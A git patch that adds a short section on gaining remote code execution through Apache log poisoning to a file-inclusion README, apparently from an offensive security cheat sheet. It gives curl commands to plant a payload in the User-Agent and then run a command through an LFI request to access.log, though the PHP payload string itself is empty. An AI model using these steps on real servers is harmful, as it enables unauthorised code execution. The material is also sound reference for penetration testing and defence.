From 61eed94f18c66dbb36524e00867083557551d481 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Mon, 10 May 2021 11:48:14 +0200 Subject: [PATCH] add RCE via Apache logs in log poisoning --- File Inclusion/README.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 8bb0a16..cc4a67f 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line. mail -s "" www-data@10.10.10.10. < /dev/null ``` +### RCE via Apache logs + +Poison the User-Agent in access logs: + +``` +$ curl http://example.org/ -A "" +``` + +Note: The logs will escape double quotes so use single quotes for strings in the PHP payload. + +Then request the logs via the LFI and execute your command. + +``` +$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID)